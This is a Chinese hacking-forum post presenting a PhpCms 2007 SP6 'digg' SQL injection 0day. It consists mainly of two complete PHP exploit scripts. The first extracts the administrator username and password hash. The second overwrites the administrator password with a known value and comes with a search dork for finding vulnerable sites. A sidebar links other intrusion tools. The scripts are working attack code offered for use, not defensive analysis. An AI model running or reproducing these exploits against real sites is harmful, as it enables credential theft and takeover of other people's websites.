|
[推荐]PhpCms2007 sp6 SQL漏洞注入0day代码
| 以下是引用片段: <? print_r(' -------------------------------------------------------------------------------- PhpCms2007 sp6 "digg" SQL injection/admin credentials disclosure exploit BY T00ls(www.T00ls.net) -------------------------------------------------------------------------------- '); if ($argc<3) { print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname),without"http://" path: path to phpcms Example: php '.$argv[0].' localhost / -------------------------------------------------------------------------------- '); die; } function getrand($i) { for($j=0;$j<=$i-1;$j++) { srand((double)microtime()*1000000); $randname=rand(!$j ? 1: 0,9); $randnum.=$randname; } return $randnum; } function sendpacketii($packet) { global $host, $html; $ock=fsockopen(gethostbyname($host),'80'); if (!$ock) { echo 'No response from '.$host; die; } fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $prefix="phpcms_"; $cookie="PHPSESSID=2456c055c52722efa1268504d07945f2"; if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} /*get $prefix*/ $packet ="GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=1/**/union/**/select HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (eregi("in your SQL syntax",$html)) { $temp=explode("From ",$html); if(isset($temp[1])){$temp2=explode("product",$temp[1]);} if($temp2[0]) $prefix=$temp2[0]; echo "[+]prefix -> ".$prefix."\n"; } echo "[~]exploting now,plz waiting\r\n"; $packet ="GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=".getrand(6)."/**/union/**/all/**/select%201,2,3,concat(username,0x7C0D0A,password)%20from%20".$prefix."member%20where%20userid=1# HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (!eregi(chr(181).chr(227).chr(187).chr(247),$html)) { echo $packet; echo $html; die("Exploit failed..."); } else { $pattern="/<a href=\"\/(.*?)\">/si"; preg_match($pattern,$html,$pg); $result=explode("|",$pg[1]); print_r(' -------------------------------------------------------------------------------- [+]username -> '.$result[0].' [+]password(md5 32λ) -> '.$result[1].' -------------------------------------------------------------------------------- '); } function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($result[1])) {echo "Exploit succeeded...";} else {echo "Exploit failed...";} ?> |
| 以下是引用片段: #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ Phpcms 2007 SP6 reset admin password exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by Phpcms 2007" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 4) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user host: target server (ip/hostname) path: path to phpcms user: admin login name Example: php '.$argv[0].' localhost /phpcms/ admin +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $url = 'http://'.$host.$path.'member/member.php?username='.$user; send(); if (strpos(file_get_contents($url), 'puret_t') !== false) exit("Expoilt Success!\nAdmin New Password:\t123456\n"); else exit("Exploit Failed!\n"); function send() { global $host, $path, $user; $cmd = 'digg_mod=admin,(SELECT/**/1/**/AS/**/credit_on,0x'.bin2hex('1\',password=\'e10adc3949ba59abbe56e057f20f883e\',email=\'puret_t\',showemail=1 WHERE username=\''.$user.'\'#').'/**/AS/**/credit,0x'.bin2hex('\' UNION SELECT 1#').'/**/AS/**/editor)/**/AS/**/ryat/**/LIMIT/**/1%23&id=1&con=6'; $message = "POST ".$path."digg/digg_add.php HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "CLIENT-IP: ".time()."\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?> |
| 强悍挂马工具:IIS_AD IIS扩展(附 | 05-04 |
| Real Player rmoc3260.dll Activ | 04-04 |
| Real Player rmoc3260.dll Activ | 04-03 |
| Pangolin号称很牛的注入工具 | 03-25 |
| 仿FirePack网马管理系统fsploit | 03-01 |
| 机器狗生成器 | 02-26 |
| Serv-U 6.X 提权脚本 | 01-31 |
| 入侵工具Knark的分析及防范 | 01-14 |
| 如何使用Nikto漏洞扫描工具检测网 | 12-21 |
| 十三WEBSHELL终结版后门的去除过 | 12-14 |
| hijack(红狼安全小组原创作品 - | 11-29 |
| 高级内网渗透工具:Paris (创建VP | 11-01 |
您现在的位置: